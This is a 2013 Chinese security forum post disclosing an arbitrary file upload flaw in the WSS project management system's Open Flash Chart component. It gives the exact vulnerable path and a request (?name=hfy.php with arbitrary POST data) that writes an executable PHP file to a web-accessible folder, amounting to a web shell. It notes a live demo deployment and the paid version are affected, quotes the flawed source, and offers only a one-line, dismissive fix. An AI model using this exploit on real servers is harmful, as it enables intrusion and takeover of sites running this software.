找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2173|回复: 0
打印 上一主题 下一主题

WSS项目管理系统Post get shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:38:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
POST 数据漏洞文件执行任意后缀文件保存
: b" A  k! C! l: m 漏洞文件/chart/php-ofc-library/ofc_upload_image.php6 q% ~, A9 w# Z  G' {+ X  h' u

6 m$ C2 o8 `6 K* v+ n利用:9 a! j5 p2 b; G3 T) L0 k0 x7 Q
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
3 k/ @% ?) f1 e4 \: h7 Y9 a. l2 c/ w% l/ ?
Post任意数据
6 X4 s$ E6 A( h8 P保存位置http://localhost/chart/tmp-upload-images/hfy.php6 P+ r! m; u; U9 |& D

. _- q/ U7 o% \( e5 V
9 z9 S+ ^* A! [" `- i0 S. _最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
& M/ y! m6 F# L* b  r' ?0 M  H/ Z! |3 l0 J3 u9 E9 ?! ^& p
<?php5 R' }# W7 f4 V

2 i+ U4 Y& j$ d  R9 w//4 Z" P' {6 {; N+ x, Z; f
// In Open Flash Chart -> save_image debug mode, you9 Q( I9 K% F0 F
// will see the 'echo' text in a new window.
- i1 l! @8 q) f1 e//
( Y) J0 i: K' h2 f
* r( }$ F( ~% ]( [/*8 L, I( h3 j, n+ D4 t
% z! {9 {" e8 S, d/ U
print_r( $_GET );
" u! @4 M: |- Bprint_r( $_POST );/ e. p+ L5 x' B2 K
print_r( $_FILES );+ L* @# y" \. p) V
& S9 z8 X! B% w" Q$ c5 {
print_r( $GLOBALS );, B& M( o# a, \4 \) q6 J
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
, q+ c/ n: [- n1 n, S  H6 P$ H
0 o# N+ Y5 s9 ?( l*/
8 \9 t# T. u9 ~% d4 C// default path for the image to be stored //2 E8 n- _$ Y) o/ A2 I% [
$default_path = '../tmp-upload-images/';
6 y$ I- y7 c$ o' Q/ I  e+ h6 p+ q& \9 q2 E
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
" W8 Y, f+ B- e" t4 q; j' l2 N6 s# U' Q
// full path to the saved image including filename //
5 o1 Z& p# d0 p. S" W# j# o, V$destination = $default_path . basename( $_GET[ 'name' ] ); % M- C1 B* T& Q8 N" p/ p! t
) W+ F: }0 `  d  j2 s/ B4 l
echo 'Saving your image to: '. $destination;
# {3 Y0 ^+ G* B( E' U' H0 l// print_r( $_POST );
" c/ B5 i4 r- @7 ~* [, h8 ?// print_r( $_SERVER );3 p- G. _2 \6 Q6 L) D0 I
// echo $HTTP_RAW_POST_DATA;
8 P4 p$ R" c$ ?1 h6 N+ W+ X* |9 C& B  o# S6 ]4 T" r& U9 J
//
0 R6 M+ b+ x1 l  v- n3 E( J// POST data is usually string data, but we are passing a RAW .png. K5 P# L2 c1 B$ V1 C/ ?6 |$ L, p
// so PHP is a bit confused and $_POST is empty. But it has saved
3 W5 m. b. F7 n0 Y3 |// the raw bits into $HTTP_RAW_POST_DATA
; p: I* q2 |) E" K//. Z% g( N0 P, _) B

2 c" v" {( y4 ^/ x$jfh = fopen($destination, 'w') or die("can't open file");% ~: N  X$ M2 S6 t% S% n
fwrite($jfh, $HTTP_RAW_POST_DATA);  i$ r9 N( N7 o7 P/ a
fclose($jfh);, {( m1 h. d) t' k& s# `, F
, e1 W  V6 i! w6 z7 M7 k. c5 X
//
+ }% P# q% {% Q: u# ^' B# o3 V) G// LOOK:5 F& X  i/ C/ {
//1 _3 i/ ?) f: @2 I) ?' l
exit();8 V" v3 A# n! F" v$ T+ E
//
; R6 F! e8 e/ m3 s) s' k// PHP5:+ R3 [& s* [0 A" \9 i5 p0 N
//' V8 p" ^" s# t+ b8 v

; s" @! N! G& T4 [% _4 g' p
* |- [7 F( p/ Y! T; h8 ]0 m// default path for the image to be stored //
. X( D5 C! S# Y' I. V: `9 O$default_path = 'tmp-upload-images/';6 o/ ~, X. E( A" {2 w- Q, _
2 s7 u7 z% s6 U) ~( J* m0 X+ K
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
9 M- \. v; j. g# d$ R# q/ O- h- N; }: r. q  k
// full path to the saved image including filename //9 W/ n  |+ a) u8 }; I# m5 `
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
) F7 k' E3 [( D
7 u, n2 S$ X. Q6 @2 V// move the image into the specified directory //& n9 m* a4 _- T; e5 l
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
8 {, J5 }6 T; I    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
7 x7 b  V3 b' `) b6 Z! W* u  g! n} else {) k6 r& d/ K2 F- b! ?: M
    echo "FILE UPLOAD FAILED";( p8 g3 o% o0 z
}
4 \& d$ l* t  q  r- _0 }- t1 C) p7 f' ^8 M- M& C
' A& r; j, v; Z, \! g' Q
?>+ i7 I- ]* H6 g

1 c; ~9 E# `' @# i0 I
: W) d$ X. R5 c* J% t7 [" r, @4 Y$ z% A( O
; s4 s+ W. Q  }1 u5 e- P

& A  u; V$ p& g. `+ X! Z5 }0 W6 g
修复方案:
9 @. I* e" m; q. n6 K+ g' j7 c* s这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
( d7 o  B$ G, B0 M8 v  L
/ K$ d2 C; k. y$ w6 R& E- j. p6 ~' b$ _% `7 b4 p

6 ?5 ?  ~- k$ w  ?( e; O; E$ K$ H* \- A

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表